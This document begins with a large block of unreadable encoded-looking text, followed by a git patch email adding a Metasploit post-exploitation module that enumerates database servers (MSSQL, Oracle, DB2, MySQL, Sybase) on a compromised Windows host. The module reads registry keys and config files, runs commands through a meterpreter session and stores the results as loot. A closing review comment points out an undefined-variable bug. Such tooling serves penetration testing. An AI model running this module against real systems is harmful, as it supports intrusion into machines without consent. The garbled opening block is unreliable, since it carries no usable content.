z8`!@hSy~JG9lUjMKYZ0L+wRfDF5ABNnyUNtw6_ZZKJP7i9cuILBvn_)v_GJ+8n(!; zNgYhYZGVj#|LUx&11{Q2kwfAN>}A4uo@idiaT1SVA&zuT zb9$vEGvDln*zLwdpXQE0F(X6|6o*0`{Rug$WzP}s0r?&iN2URJF+>j%Bf=b6Ja2xu zqch}m33ud>Po7kCbfJFg5byYc>K6%)08%F)$uXCnKd<7zab2GKL{&#V)%&YE8WG-6 z%Q0H^U$UbzJ+H0jh%wPBt9BE|^;9&SD(19ylorDy^#GwabaW=Qx~8oOhypH(iH)0} z7Lb~l+0a1~*TII4DrjJ9V@GL{8`R8^Ozm}Q?zjs1B00q|9gq7`9K)sglX`!;UdOoB zxw5cLv>xP6OLYW-Nxa|Mafo=^IC^r@Y2mR!T`l-P$|5#wa#VERZ0qpz2L45NM+>T3 z40Y6`I%9&PDb@R?Ia*WgJKvE)_3OE+{$!J)zq7|thv4N8JL*$C@SLMD)t}vRG@<(L z6GumHYPXAln?{pui?`k>ULa+aY|8ZB%qHp^|$Kx)ngGAPGSA7e8)F*yE?y3TS^@OWFs-`Dg zEm6%p;p&I#-U-($1U%_#k80jY7gl}Z#7S2ws@y3W)2_x5 
zq{6>HBSTlpUv6fz{sx~EO5csPEesZfs>{&F+7440IBFM_i0ORN8;JTi(X zd6Kwv*;PtPrEjS+aEwKzY@tZhxtX`prBr-mr6`NOltTN(DL;ElQsUz&MOpL-)c;Uk zo-8TxRg|KnkDmI0ib`>r3#LlSBZZXo<my>xT&?v3E1LLd4R{&F+3_lr4aU06?vU1wb(rpZ4WM}I4AEd4f6VNQJ-L z%nEIV?+sTear}Z(9{i^H9Tcq0MHfzvMAAjT-tDMh%UW~07;@3&MT%T}vTvctzu*cm zjqak*Gur`ur5Rkq1qZC3CRCEbarA*P#3LMS0s78DPqw#sQXOlt)(*(|C%);0VhuQh!s7^Xr$tqU3gaN1bKV=ibPu#t#;!mD;No{9;tT5HCx%{ZlEU= zheaNmNtVQogegyo&ipFd6Id-aEAnBm5Q=8rfQX)M1S5d@ddGLJEjmxw-k#!r;{v) zPbkcIV4&&DTcEynTETV$M(LyN?4{?rAazhFo<0iBlBY@u>un`h9_~rGGcGDj>TMZ& zeQrZ;&J_j2DW6>|x~+mc;nMYwl*QYwDfDT@@&~aT{$0Uv`sW`8RibyzIDHCPlnQ;~ zS@_G%ye2MzMhv7M@%PPV-EsN$fq3O#I_rsn$gj zch*<*&POP{sp}=fDa#a{F~Yya<$W%W{sE)9{vo-C{{ikd%P8(;fRRW3Ie`2(a~;tu zAI#Sj^D|-|6{VQt(LOn&=y39XT7DKwl;vT_2l-&!Q&BN~1xCP*5NvH_1vA}K!sb3| zl->q{s1!FNzN(^30VTM5-UIi>8VZ)>;U1J+KISP-V5t=6K2}Fj{!zt*{oOs;FSkjA zrIBcVAC8QujjxliB$53aKJD9H-=S}*6qi%B3z3sa6YhgMyu0H593lYQL$FtSi;;iA zXCu3s9OCc$vMJ}EK)f?RA(r=m4k<5Oy6m{z!zqu~q8%#q4Q}BtH?zCo4pudp z-Mb#j@sA|sOaiW&<^k?kz_SD_m?43|BH|r17xI@f`!8VD7#>W&zod-u1iU=o1KfKO zi*~r+ot^tK@-QT+6n8=RA`j^c@Dpj^rFJ3Hd>ErroYZH9hqTRO71ala?~hZb)c+mj%ApZ~tXY_1|ApGmo?&mi|?bt3c= zlb*>)oqY3_u%YQRi)fQ!DJ?!Ltya`!PPs%PBAg2S znNZ;`H?z`5V#?pHXi7(2J~$QY49^O--fKd5Q7JxL6Mq-|K?M6h0*`r6KHjz6umpPKh$94CUC}Bw zL|FsH1g?8YJ-*M*U5rskrMR-4+gnAimev5uHIlUcg_iCmnDnR=CoR{}DiT_Q^dpd> z{Y5XJ^TW=1jcdZ@@VkyhdW!KUm{ zFpF8o+ZIvA4A>vvC|GB+q#H)C*dG+E_19MWyu(uFPJ(A2RPe`&*4qMD!4U;Zu}J=2 z1RL~=g3bI1=8yN50yYrh*hz)BrHHu|u=-~dtgcm;EAAc@(rXLyfN9Nng*kKrVkqFK zAAHVjembfFV^oS~XTQrto=8M1*3Yk=jg2&w;u&FIr0}un75HXR$A-pdl@~eKDbkA; zKY9le6cJEQ?j23rD-tFSgg+7CZwZoczNYBpYZuyMno3kr65``*nrN@V*3F`)297$_ z6`}@`f;|ngtrOSVl<%fB}{$R7FQ1eFXek5i2U*Amo z2nmczaVd|y6{(+CoqFHQ;nb9E;jn0Hct`1*Z1)%5 z{<=Q}|M~?!U);cAfJ$+f*K1Hn+s$9Pe7HX(^lSlW@6SwrVr79^jhoK+M{mP-^HhpQ zad10v%wIPC46G)5cd<7B$;gxA+64eMvX=+u$#MIRc1@QKH~ra{Fx9DV`y6yddL!1T zV5k)Rax=%hK}1Epm=XvLzne;WzYQBF2dW8cyQ9Zi(Jm0Z$lou-9RLnqxj-CsKPZH@ z&$Qb_C7Uky3FS+pACgws#qw2lKk<5L89pNkSo;$X5a(<%0qCVao+}rg=I)<*P-)BU 
zn)p3{^3MDq@ML`MK~xQrf?5)A#X1QrBlO#9Z;}P5>GU?SE=ZT_wFCLXzQd=fj7ssz z^wh87Qm`H(eBe2961@ov0Tq?vl%>xrN*Vw}xhwHh!GBYZxuhu9c_>W@K|cRYdFVHy zlv8=A_{QrbdWK5zoL}Jv5tS(%W4+42;(B^kDNFI*|EfPm0!Mfhg5V zu}vzgCsDT%tWp~VyI5AI{ijb9V1wEg!E9o3bB7X7`u`m>^P{HFn@aJit!)Rz(=){p zP^isUB^qNx-Yzw=K;dGVIR zDiSNmSgT(FBDhKPiNoG$q}}NdQ!6MrMX!bbr!PADDDoo}bbLxCZj*@BVK0fm`(mj| zuQ@N`BcKMA;@RU?B_gj0?uBvS?ofvwONk%i^fF{a$lRN~OU&ntO7Us*Y;#3 zHL|>8?EL}1OdWM4tLppKG6~&M%WPR!iu2vZDV}IKvAaqQLo*e_W1J}w*S4k#xXv6&^iVzu#daE$1b=hBSC zt`4K@kSjbTr^rw*ZW!I7jpP9~{qkVu}5mo>knL&* zwSu9K_`!%C7HHfXJxcgI*Q~~%k?VMb;d?K_s6MJvKoqm{Vo+C{1@jV6SCU2X7-RaV zPF`f)n!`DFhQPWZM(*%bBR=D_@zW<2jC*638D~e#&R18)Se03u#~WFnMi{O!slEwN znFy6h%$p~}$`qsVn3mGQa)0)oVl)~blM|BB#>AtH+&*E(&58AlTbYr@=1-H2s$;y( zLAP}B)NTH4W=rGVq!?q+cps6z z$7;(-m<)%NHyTd)iI>lbni{})U3f3TXf>_0wLbIX4U7rXR3|jb*;!()m9e>2WAm6O zBWSWu^VSaL!(yGxmz8p|XckA8cqc2(66liXWJxTUa4B?2rArwnE6d6ewLD$Y=&=GR zsHm|@8mnw{91htQl*rvlhhIk}mJERyqq~;fBw;a8y!lW?vBzg3f-c zX9RC&@T^2}e5tv(v2>~z4>Jm7g&FO$su_o}iW_^fyliEXQ#p&2y>UCsiLp=8BhxtRXzasJynt;}vrb_bg^I3a<;b zROBqgs5#SLY+i417;(L0-*mR&T&Qp55BOL%h>v5R@K4!1 zKAtV-lh`UgneE_H*iJs3?cvkdK0brx@+@|S&oZ($IjRdN@cnw~YE^j$`E&etUYSX2T#^15?x=t3y>(O(4A~&GBhA!TSH>SHL zbZJVLW^`#zmliIb(TKNn@OODDCvVN$I9V0m*2UZL_SCu#8t>@jop@(Lcd_%XWKJ|; zy3wUOUEqu!PWCqO_H?p3{5|qeFH+uHqqh~K33!7oNR!6$l#x9e7uu=$kVCa$#y=0 znl+IwlQcfr$%dhS@Gym(@E%>J(&IE+^@|wv_>ohlle=bUe5RdeQ43`+Or*PMbeTn$ z?sS143@4k+XVb$R7?aB9YFs$kbZYH9C!0ypFq5~{_Is1r|~5@ zjTg_b@ulME5?c|xLAx=JX>cuY%B7yQGIEk(R6ii@?~~W=PUUt zov-F=biS5im0tROiR2mLK?Wou8n)Eo`gCPwMHKGY zTIXl@3XT7w^Iu8NS-!&9xF*O2yUy|RI={d!8pqe9*?%QV*Yb--p|uGwp@Wj%`SAT74ZD6kVDKQFKje>e{#e??|I+yr{#57B*hP^w$>ML^ zS!cKK=dktIfC!&ts`7=-U-DNl7mbcxU*G>Sf6bY#R?q%}dVUCdO?WK_8R>n3a`vou z*_+MB0J38UA--^DqHvNBu_Yn;T0%q}pp!ySLIfaSVTw1vqRhcQXX~JPy%D@EvB3u5 z0vYC1tSWR?W8RqJ_y7j88f+u5^x9>ZBWz-u0ZlA~ZNVL98l=9!oeBC7uu@;vwwW2E zua2CO)CW%kOi3D|&PI4`H)b)c2`j^zqK0OmGzYc?W<@Po2TY5)vR14wYt04&e!|+Y zk*uApzZ&K)5tuM+W7|I{?FN~#3`}SC0y=0U 
zNb`1We=N;=4>Jb_1sdxCYELw|7c0Sfvjp}&tHk=iyuO&oeE?(nLwP#52IA>M+zn=< z*$_5?4Q12WFqXxJqboi^<43Su82lp}#m=JMbKttfGNt+Np(7HYfy}qCO5LFJ0K8@e ztOTLWXx&!K!@h*6HuPUA`-*)nd*iCde8#S_Z$P0r+g0|hY@9bcEn93x_4Q?gEojI= z_MPg59ergpQ!&$HY%-iN1-(BNlfo&eX&QQTI*Vg7STdW5KF>l=%tAlRWNn%8#^Yt+ zXYww^MLSR5)7>G&9EZj>G73y^VG9`rW@wA^Si;$18#^LR$=q2?n&Ol_vJio_=pRAl z%f3f*=;zChqB3ftFFS^?rN~G2AsxUq@=QxzaUrEkZ)ZWJS$@;nD44C#CyH_m8AIr|PbbTpBnAUSVjHhSqo^o&(TbMd9O;h_%x2L<-tg7k%^| zLMa_RI2?U95q&iay|n=Svl`yt0{`z~hk-qU=6sJ(IEo(of&GDoJcbc3*-36?KXGq% zibu24SaO}=W!O&{yed1(8?f`z{Bg_+D$MLBgoYhapEE|uGHZiKJKH`!-*O=;ZHkMo1cy3}7IYtNkO*xEmNGdBPBie#~^JC}A!`~K=7QHce!5f3; zcnnU$sHbdVhJi@Y()6kOqFa!O-oP^M!V208GjV@eO&|nfx2L+5Q+tddSNg8nMH*@OX}gKoc$b~j>k(dpM=SU+UKo4B(g zwX|WkaAyN2ra08voD~OB)#w_949@ssIBN+j%$H$zWjTxBD_9Ah%@X-aR-UgyOIBlU zyM{G^i#qVnSvp_GGWdEniEqGkcOzTDH!)0e(1I=O0RMs=;yLUD-->ax9j|*gyNw0w z1HO}UzKc6Cqw&XtCWPB}CntKu*&8UF_JN#gTelQ>@CxKZ}($tHr++g9Vw_#}0l<=Oo+|8fiq><3d8i+|2&p z@^Oks$rE=5#+owSjuEF!w_^;F>Hjd3TRE9Q71aiX<`fz#ax?AkRQ^vp)wDx981i45@K!~Gyzp*Nib4VDXZeCzs3W+{i=O6yvk>?3aAy3o)6M_gY5#7zFE9MR z^_c#v9zUcuWl=I*L^j#t+U79Ht6W_Ce|>C2uVLy5GXr=ai5tn^2FP*pcLRcWut)Jf z?f*Y~U%-B3ks>M?!i&E?~6{7szvToRYO66G}zZ7YxO6;Y`+KX;RI+!tc* zt`+!?*d}+EYs~wZiDgmbCznN+jyznPyYAB5N1O34O`y+g$?p&x)mp)R?G$X+5s>6s zu6TEhSiX>liRw39cCmUq-|J59$`eVbb9WvnmCv<$cTr47-!OIRrI@C@?_s*tVEZ=7 z%wQcBStCC#-sBstQLD&)i80as(i$F52@&9En*dE`y@~0QyY%Fr1VDK zh29y@#%9x{==^(JEU!^l7_i?Ns!H`=F273Oczg z`Prh4s7EDsW$pSbMqjUgsM9bYHHRGzerEN+@aP>VHvP5AHQO}7Z{NHUEkSh0+0 zEWy3yO;N;mp^_=t2Iy1M6cz}W*xK}h@bMi?We9feVoD+_X7n_jA-Ue~o30YRaevb{ z(yAw`FU=c^x$xM+qGn?r*y?-G_RA-B)xSXO4C!XPV=PrTsV$X>R(Hnu>IOf+9JlnAefBwi)IM#CmtGxeCGf z1?GF?ywDZquYCaXzA!hJ+CON2Wwn^L(_GTsdAm7=SSRcR3GmlF=Cw5d$GtQMMFTD> zZrNp}$nBP0qKwE|XZLfbm$EpdmO8z@&ypwslPcy7{XvFUYpXAHrr!tFp@g53 zZkC)Q!%!0(-J?L+j~#R?kBtV=>DcuTYafA7m!pAsImW)IFM^AA)5Nb82NtL_?>N~+y1TX9qRt3-`QG7&Q>)7UrJ8* zu_LxfQu4HjkcT@r};G0;3p~7;%`@RRpY#SzsMZ@ati5orTqrz$| zyD^d7!~NKPUI^z)KI|aJUJoXncssD)cn}tB!R#iMviEo>xAQPwn1^G*R*aYC#d%UI 
zUV^9MWTY&Q=5O;DUXRD}CcG4H&f|DD9?yG$?E{{`(|IBv&6D`2Jeg17DSSFF$7l02 zE_iu9p9k}$ydux$mH6kpGIqbKibWaPkB*v{KE8!hh+1OUXstefB)%H0)d6s3YR&!0 ze?xC?i2n%7RVp;)69WTG{_b&^+Ogo2@|Y;n9N3QaRh8|ms#>}%2S)8e4aO>Z2zLGR z&sgnZ`U0(nBNJ<;G1$!+D^4%ac9)tCt{FH6osV7B1#s&^?7}T#HL$bR0;{HuY#Fv9 zm$Q%93bA{kwvw+DT^DJ!92=oz6BdJ;#fC-NkRn^5ZyWa0upNeNsz|J7W3j!F%67S{ zEY|G2>H+L%eu>%ZS1b)%RJ8!>VMX5r8;BjSRn-++Rqtb~XDGI+GO!Arh^?ww*m;|S zt*UwKq&sto7SF4mhM~V;7vooKz?{W)?>U^lo<}U?VO#71*3TEQDRBw&I%Cit2S+VyBp<% z2zQ^A_Lp+Prw1>TX(GZsZ4FT1p0ds^GsMP?_VQSFxUcT8zls99@~geN)N;Rm$pmrn ziapxh^t?ThD$K~UwRBBjcw>p4#T}>dSha*>FsBz)>BZBAwnb34 zWny$=N04YxQV$Y$N;-NFabVp}13m@uQzrhH0pj3j$6Dx!h;g)njv+A)96;@M2bXoU zraYWp&ar`Dc$y=StS?v5F`J$bS8~L0n%7OPRd/-OG_`&AvmqD!nE;ZCdK*hoyj zS9R1Rq1YOZ56S+8wH!(Ge5AG`+C;(?YdNkpfGrKg=9UmnjMD=}d|gK?va?P9wSmP! zE6&96U9b~GO{}l$pm*Hux{g$;Afmn_m=srNB(KkRbEyB)0^{@$R6_jJ5N@V$>5X#|&KI^HID zd4{7Q!Q>^5dIX2BSMcjyieEqEs6_a8PCKd*9DmjE7QsUg9JL5~nVc=Xso5{9bY@P} z>s0m5^KlmSrqH#Os0!2rN3#1yxYLV7{wnS4iEpUf9VY#P5+9v&VICwlopV)_pJ|Ev=WqnOTa-BOss_;gysIw2`tz>t06rI7%?WwI z)f8as1s7(0;?V_H1Av+rC77nbFBe^Pk?i(iczN z!9}H@%IyP*bIylKBYo-g-+XNcOO08VJsRmdr?t>VrJ%+a!z5>FkW%^gM@|1`ygEWM zrd;u;{QJ9>e{=30L!7gwYhvORmo8iM_a`dE_?EO3U>2Oxgr z&b*t8_HV&XCzY@QjHC7&U7iGsK384-=VvI^b zt;zSm7$GXaL8cRk%4-mQ>wy#=dQI9rl~AJ|0~I93hv|ND5Ya{pFQf-r0uwkBC(82x z;k@qhL-pa;U7?nm_=JJgOtt=H8U<^S%kO*ft7ZF_U5MH z6N4zyPPxM*?VL4Nu~+#+s%Z8HRIHt^aM)_n#N4Jh#C2lv2jU8Qi?m6Dzx`HdOjLLDBuR#CcaLDhHe$#{BB zB4ySq0ye6oh}@!*BK0>Z%5*nGKDjSNCf$cf*Doke{KPJZpynS4XWlMxbN_S&P?yWC zE2*XEPQ~0Ym)k{?Kc$wAe?lTh{!E1DN=X8qMY(jjwE&pRITXzrJ{sBP}Ru2 zE-5qQ8%62vq3mt%8=z#SeWxhLkHdiLmyt}4?-mChz=G@}igMp0GkVyX%1UPUF-3Xx zGh}K!ltwpx2$7Q~6d~iGD}XX=;~7iNwMN>YQZRMg_(^eo`%w8+ZlEbs&nSxiNHt=| z*$SsTrk+)l~*y}WD;tVBw^v`k-Oy4;~)KiRy z3IU!(eeqy}#dF|kDh2h5LW;G>6B&|;PaxjiPvN=%NA0SaF>io84f~&VMF%O))k=B~ zNp}oUxVs+dw=XO%Ivw>=DOmTl2;z)IkJNt(!S%(J;JtXXXPzhCvOwYUMC4O6^eeOp z%x8$XNW5b1SO(1UO^3!uJOgEMqM}40BarpIE5}AZ!{G^)g7xoDRh;vlNxd6L`d$U$ z`<&ADGc^;4nD9;KZ_#cl1*N^45GPq*={W>lEtO!C4lw9Rur7NelPJ~Oh?EyFf9rD> 
zw$sEB!VT!CaIa7o8JYbOIsccPS+^^3#zU~<3kW8@M~{KxGvtwQ2>!is z`tNb{P$W~Wr(eid_$?CNFhZpKh5U1G+&>~F`#MrkBb$qmI0~8H8S?5>ND6dKA z1Rutz6l8pX7Z_FK%@ya-4-Uo!z-?3ta^`+6YH~dZ{XLMw6#tD%5c|z)%1bl4{Y2@t zMNytWCAhsz!0p;fxT2!ANvC;RTf+5tB!-&w(vj$kpZsQ59E)KY1f7zKMLM-A$ zs>NTNHc4%_A!$yF@*pG3x_rgSjq8jkJY8GA2y>|yk_xc(6mrB7AH)60zx9BwD=0nmnX_#-5-P4;kTIGIq^Z~ialxj?kYTqs&d4<(;HVUQL5Aj8 zM57y)BBHt`4Qr%9vgLKrSJSaUB(mtyC@wbPkp`gg-K^|I2s0`LEqbf2c%Vs(g6)v; zZ79myf4(rX<)4D0OPB^ ziV-{26qic~mo-4)E;v;9Pq;J4QZAe^D$)5a2h7ea@ey$r6ODh-Y~qeLrp>fkUhq?w zwqmIhYm>!URwkkrSVM$Yuud=Y`A$95VxNxM3G%o=MPw^ZQca-q&R_M-gt+Hww2) z;eH_8jqeoB($u#VVdQ!>qx6=|W5tYHhWk0_&XSAe4$ z0ULZIL3~Px6lDs zG@@YukVOwmWUv?;p!-EZTzl)oAYV)rs1yvQy^n27!C*-5Ov+JI2Qi3rm1@mhme@)Z~)ryFWAlWC=f)IAID~NSLdL-KM zJw1L_Rn!bdHl!p(!_Pf6rfYVw_LfVR68}En$u|o&eVi}xDPFoT zZC(-h=*B!?Gt*50;%E_x%>&k?EfBAZ=xG!y@=$_OzGcB;ur6P%6%&z#CF``JP>`@( zVgD8Ad7zm;{ZxBH83p~wr+e{0$2R+&Z2gC2WG>p+73T;gB))Pwwk+wI~-s4_~P zflx9rAAaGXR}IqxC|*RH>J`lij8Q3=O&-0LtVPAtFc~ik!r+Uf1UnNcY4#xTz@`Fy z(>$LI*YPr^5|ZB+fZ3VhX^J;Mq*u4wL}a*BlNb)~SFbJ_hU=v$#7t)cO6<@Xqf#(n zpVtwy!}S<6Z4YEDH(EfQZ%2EiC=@I^$0q{VW~~)ALb{ne^!150gN5vYpW4}lPj`Ea znCXyJ?;wHJos>X$L2o-FL0df>wA`uo08u?sxqGLh<9gu}iP*R_GM_dXG#IsvB*HTD zu>&Tdjr3-xBzS{pg%^MpwaV@%LXq1bkrIWb7hNoxMB#0;TYQX1OVwrhOgIq23JVi1 zQjklmT|N^R6sw~cSjVo)XRT69>T3q9Y1d{kpqL&*t~_+F-?#FEGYq_fFUy@L#r@)X zh&WzMjcYnn3Z>!sKb%ibDb9%EigRD`nV0{~+42{~+26xyN-W~@-<+F%Q=I1=N@tk( z%Ih=+JC%ZY+<5bDS|Mr3(z!WmSot&Wm1>^ug-%7$B14^e7Vi`}B>mQUwHC*LcHerSmx7 ze3!0`gPvST^%I5aIZEbtj8{Ae4{MSbmPhfjx#_@hFL8ic(Y}$#Vi>M8b-%^ZRG#*8QpJv%&v4W;Em^c>-$8z^S)1U;J69-rKF z;bf?!Qc&&ihKlpMmQedgDcS3j6Ue+qim*FDk0TXtjuCOBSI}2$8jIXyJzB&i>i7yw zR855RgANjxl9HI-zgN=++~jY@=?wn&1zI4SnqEKPo)=?O;$Tt!FFUhxU#03yqRfT2 zN!3RmD_nAtni4-f+ikQJMo=jzy<>vnoCr=BvM34CR(w=K#$EJC??@bV#{@|#1*My0 zE6&a99X3%dS$d*jGE~g}LJ?*r>xIb^<7WP7JcQ{~3VI^%0CD1fiV)98F!To{SSZe6 z#eYEYPbY|GDPU-SPBF|$k)B&axFxp~?)8KJ6?#n!m!2wyTB+DCggI}{S<#|`=A_x3 zqUI8W=mN09s12#eJ`)2KGPUA=bxr52*9nnm7nRujegVwR{Jw;g3l-JN=tZHdT^T4# zO?8U?m7I}cei_}1rkJ6#Z+0m(moq8_- Date: 
Mon, 24 Sep 2012 20:34:26 +0200
Subject: [PATCH 06/17] fixing and cleanup for pull #802
---
 modules/post/windows/gather/enum_db.rb | 339 +++++++++++++++++++++++++
 1 file changed, 339 insertions(+)
 create mode 100644 modules/post/windows/gather/enum_db.rb
diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb
new file mode 100644
index 0000000000..2d34e528ae
--- /dev/null
+++ b/modules/post/windows/gather/enum_db.rb
@@ -0,0 +1,339 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'rex' +require 'msf/core' +require 'msf/core/post/file' +require 'msf/core/post/common' +require 'msf/core/post/windows/registry' + +class Metasploit3 < Msf::Post + + include Msf::Post::File + include Msf::Post::Common + include Msf::Post::Windows::Registry + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Gather Database Instance Enumeration', + 'Description' => %q{ This module will enumerate a windows system for installed database instances }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Barry Shteiman ', # Module author + 'juan vazquez' # minor help + ], + 'Platform' => [ 'windows' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + # method called when command run is issued + def run + + results = [] + + print_status("Enumerating Databases on #{sysinfo['Computer']}") + if check_mssql + results += enumerate_mssql + end + if check_oracle + results += enumerate_oracle + end + if check_db2 + results += enumerate_db2 + end + if check_mysql + results += enumerate_mysql + end + if check_sybase + results += enumerate_sybase + end + + if results.empty? 
+ print_status("Done, No Databases were found") + return + end + + print_status("Done, Databases Found.") + + tbl = Rex::Ui::Text::Table.new( + 'Header' => "Installed Databases", + 'Indent' => 1, + 'Columns' => + [ + "Type", + "Instance", + "Database", + "Port" + ]) + + results.each { |r| + report_service(:host => session.sock.peerhost, :port => r[3], :name => r[0], :info => "#{r[0]}, #{r[1]}") + tbl << r + } + + print_line(tbl.to_s) + p = store_loot("host.databases", "text/plain", session, tbl.to_s, "databases.txt", "Running Databases") + print_status("Results stored in: #{p}") + + end + + ##### initial identification methods ##### + + # method for Checking if database instances are installed on host - mssql + def check_mssql + key = "HKLM\\SOFTWARE\\Microsoft" + if registry_enumkeys(key).include?("Microsoft SQL Server") + print_status("\tMicrosoft SQL Server found.") + return true + end + return false + rescue + return false + end + + # method for Checking if database instances are installed on host - oracle + def check_oracle + key = "HKLM\\SOFTWARE\\Oracle" + if registry_enumkeys(key).include?("ALL_HOMES") + print_status("\tOracle Server found.") + return true + elsif registry_enumkeys(key).include?("SYSMAN") + print_status("\tOracle Server found.") + return true + end + return false + rescue + return false + end + + # method for Checking if database instances are installed on host - db2 + def check_db2 + key = "HKLM\\SOFTWARE\\IBM\\DB2" + if registry_enumkeys(key).include?("GLOBAL_PROFILE") + print_status("\tDB2 Server found.") + return true + end + return false + rescue + return false + end + + # method for Checking if database instances are installed on host - mysql + def check_mysql + key = "HKLM\\SOFTWARE" + if registry_enumkeys(key).include?("MySQL AB") + print_status("\tMySQL Server found.") + return true + end + return false + rescue + return false + end + + # method for Checking if database instances are installed on host - sybase + def check_sybase + 
key = "HKLM\\SOFTWARE\\Sybase" + if registry_enumkeys(key).include?("SQLServer") + print_status("\tSybase Server found.") + return true + elsif registry_enumkeys(key).include?("Server") + print_status("\tSybase Server found.") + return true + end + return false + rescue + return false + end + + ##### deep analysis methods ##### + + # method to identify mssql instances + def enumerate_mssql + results = [] + key = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL" + instances = registry_enumvals(key) + if not instances.nil? and not instances.empty? + instances.each do |i| + tcpkey = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\#{registry_getvaldata(key,i)}\\MSSQLServer\\SuperSocketNetLib\\Tcp\\IPAll" + tcpport = registry_getvaldata(tcpkey,"TcpPort") + print_good("\t\t+ #{registry_getvaldata(key,i)} (Port:#{tcpport})") + results << ["mssql","instance:#{registry_getvaldata(key,i)} port:#{tcpport}","Microsoft SQL Server",tcpport] + end + end + return results + rescue + print_error("\t\t! could not identify information") + return results || [] + end + + # method to identify oracle instances + def enumerate_oracle + results = [] + basekey = "HKLM\\SOFTWARE\\Oracle\\SYSMAN" + instances = registry_enumkeys(basekey) + if instances.nil? or instances.empty? + print_error("\t\t! Oracle instances not found") + return results + end + + instances.each do |i| + key = "#{basekey}\\#{i}" + val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID") + val_ORACLE_HOME = registry_getvaldata(key,"ORACLE_HOME") + + if not exist?(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora") + print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)") + next + end + + data_TNSNAMES = read_file(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora") + if data_TNSNAMES =~ /PORT\ \=\ (\d+)/ + port = $1 + print_good("\t\t+ #{val_ORACLE_SID} (Port:#{port})") + results << [ "oracle","instance:#{val_ORACLE_SID} port:#{port}","Oracle Database Server",port ] + else + print_error("\t\t! 
#{val_ORACLE_SID} (No Listener Found)") + end + end + + return results + + rescue + print_error("\t\t! could not identify information") + return results || [] + end + + # method to identify mysql instances + def enumerate_mysql + results = [] + basekey = "HKLM\\SOFTWARE\\MySQL AB" + instances = registry_enumkeys(basekey) + if instances.nil? or instances.empty? + return results + end + instances.each do |i| + key = "#{basekey}\\#{i}" + val_location = registry_getvaldata(key,"Location") + + data = find_mysql_conf(val_location) + + if data and data =~ /port\=(\d+)/ + port = $1 + print_good("\t\t+ MYSQL (Port:#{port})") + results << ["mysql","instance:MYSQL port:#{port}","MySQL Server",port] + else + print_error("\t\t! could not identify information") + end + end + return results + rescue + print_error("\t\t! could not identify information") + return results || [] + end + + # method to identify sybase instances + def enumerate_sybase + basekey = "HKLM\\SOFTWARE\\Sybase\\SQLServer" + instance = registry_getvaldata(basekey,"DSLISTEN") + location = registry_getvaldata(basekey,"RootDir") + results = [] + + if not exist?(location + "\\ini\\sql.ini") + print_error("\t\t! could not locate configuration file.") + return results + end + + data = read_file(location + "\\ini\\sql.ini") + if data =~ /\[#{instance}\]([^\[]*)/ + segment = $1 + else + print_error("\t\t! couldnt locate information.") + return results + end + + if segment =~ /master\=\w+\,[^\,]+\,(\d+)/ + port = $1 + else + print_error("\t\t! couldnt locate information.") + return results + end + + print_good("\t\t+ #{instance} (Port:#{port})") + results << [ "sybase","instance:#{instance} port:#{port}","Sybase SQL Server",port ] + return results + rescue + print_error("\t\t! 
couldnt locate information.") + return results || [] + end + + # method to identify db2 instances + def enumerate_db2 + results = [] + cmd_i = cmd_exec("db2cmd", "-i -w /c db2ilist") + cmd_p = cmd_exec("db2cmd", "-i -w /c db2 get dbm cfg") + if cmd_p =~ /\ ?TCP\/IP\ Service\ name[\ ]+\(SVCENAME\)\ =\ (\w+)/ + port = $1 + else + print_error("\t\t! could not identify instances information") + return results + end + + windir = session.fs.file.expand_path("%windir%") + getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1) + + data = nil + getfile.each do |file| + if exist?("#{file['path']}\\#{file['name']}") + data = read_file("#{file['path']}\\#{file['name']}") + break if not data.nil? + end + end + + if data and data =~ /#{port}[\ \t]+(\d+)/ + port_t = $1 + else + print_error("\t\t! could not identify instances information") + return results + end + + cmd_i.split("\n").compact.each do |line| + stripped=line.strip + print_good("\t\t+ #{stripped} (Port:#{port_t})") + results << [ "db2","instance:#{stripped} port:#{port_t}","DB2 Server",port_t ] + end + + return results + + rescue + print_error("\t\t! could not identify instances information") + return results || [] + end + + ##### helper methods ##### + + def find_mysql_conf(val_location) + data = nil + if exist?(val_location + "\\my.ini") + data = read_file(val_Location + "\\my.ini") + elsif exist?(val_location + "\\my.cnf") + data = read_file(val_location + "\\my.cnf") + else + sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%") + getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1) + getfile.each do |file| + if exist?("#{file['path']}\\#{file['name']}") + data = read_file("#{file['path']}\\#{file['name']}") + break + end + end + end + return data + end + +end \ No newline at end of file From 2784a5ea2d7b9aceadab811ca90ce96bca945b81 Mon Sep 17 00:00:00 2001 
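Review bot: In `find_mysql_conf` the first branch calls `read_file(val_Location + "\\my.ini")` with a capital L, which is an undefined local, so any MySQL install whose registry `Location` really holds a my.ini raises NameError, is swallowed by the bare `rescue` in `enumerate_mysql`, and is reported as "could not identify information"; it should read `data = read_file(val_location + "\\my.ini")`. The bare `rescue` blocks throughout the file hide exactly this kind of bug — `rescue => e` with `vprint_error("#{e.class}: #{e.message}")` would keep the best-effort behaviour while leaving a trace. In `run`, `report_service` is handed `r[3]` unconditionally, but `enumerate_mssql` pushes whatever `TcpPort` the registry returns, which is nil for instances on dynamic ports, so a `next unless r[3]` guard (or reporting with the port omitted) seems warranted. The my.ini fallback does a recursive `search` of `%SYSTEMDRIVE%` with `timeout=-1`, which is slow and noisy on the target; consider bounding it or restricting it to the `Location` tree.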
